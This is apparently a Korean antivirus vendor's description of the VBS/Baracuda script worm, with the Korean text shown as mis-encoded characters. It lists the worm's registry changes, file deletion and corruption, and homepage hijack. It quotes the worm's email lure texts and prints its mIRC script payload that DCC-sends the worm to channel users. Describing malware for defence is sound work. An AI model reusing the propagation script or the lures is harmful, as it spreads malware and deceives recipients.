|
|
|
|
¹ÙÀÌ·¯½º
À̸§ |
VBS/Baracuda |
¹ÙÀÌ·¯½º
Á¾·ù |
Script Virus |
½ÇÇà
ȯ°æ |
windows |
Á¦ÀÛÁö |
|
¹ß°ßÀÏ |
|
¹ÙÀÌ·¯½ºÅ©±â |
|
¸ÞÀÏ
Á¦¸ñ |
|
÷ºÎÆÄÀÏ |
Energy.vbs |
¹ÙÀÌ·¯½º Áõ»ó |
ÀÌ ¹ÙÀÌ·¯½º¸¦ ½ÇÇàÇϸé À©µµ¿ì Æú´õ¿¡ MSNetLog ¿Í
À©µµ¿ì Command Æú´õ
¿¡ Energy.vbs¸¦ »ý¼ºÇÑ´Ù.
·¹Áö½ºÆ®¸®¿¡ ¾Æ·¡¿Í °°Àº ³»¿ëÀ» Ãß°¡ÇÑ´Ù.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\Searc
hMSN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\MSNet
Log
½ÃÀÛ È¨ÆäÀÌÁö¸¦ "http://vx.dirtyhosting.com"·Î ¹Ù
²Û´Ù.
mirc °¡ ¼³Ä¡µÇ¾î ÀÖÀ¸¸é script.ini ¸¦ ¾Æ·¡¿Í °°ÀÌ
¹Ù²Û´Ù.
[script]
;MIRC Script By Ahamad Boby
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick "&windir&"\Command\Energy.vbs
n3=}
¾Æ¿ô·èÀÇ ÁÖ¼Ò·Ï¿¡ µî·ÏµÇ¾î ÀÖ´Â »ç¿ëÀڵ鿡°Ô ¾Æ·¡
ÀÇ ³»¿ëÁßÀÇ Çϳª¿Í ÇÔ
²² Energy.vbs ¸¦ ÷ºÎÇÏ¿© º¸³½´Ù
Á¦¸ñ : Surprise
º»¹® : A nice surprise for you, check it out...
Á¦¸ñ : Great...
º»¹® : Great app, check it out..
Á¦¸ñ : Important, Please Read
º»¹® : A paper I downloaded from Symantec about
new virus, you should
read it
Á¦¸ñ : Happy Birthday
º»¹® : A happy birthday surprise
Á¦¸ñ : Take a look...
º»¹® : Take a look and the app that chenge to a
pic
Á¦¸ñ : Great Joke.. Read it
º»¹® : Read this joke, it is so great... ha ha
·¹Áö½ºÆ®¸®¸¦ ¼öÁ¤ÇÏÁö ¸øÇϵµ·Ï regedit.exe ÆÄÀÏÀ»
Áö¿î´Ù.
2 ÀÏ 10 ÀÏ 20 ÀÏ 28 ÀÏ¿¡ notepad.exe ¸¦ °è¼Ó ½ÇÇà
½ÃŲ´Ù.
½Ã½ºÅÛ Æú´õ¿¡¼ È®ÀåÀÚ°¡ sys, dll, ocx ÀÎ ÆÄÀÏÀ»
ã¾Æ ¼Õ»ó½ÃŲ´Ù.
|
Ä¡·á ¹æ¹ý |
Åͺ¸¹é½Å Á¦Ç°±ºÀ¸·Î Ä¡·á °¡´É |
Á÷Á¢Ä¡·á¹æ¹ý |
|
|
|
|
|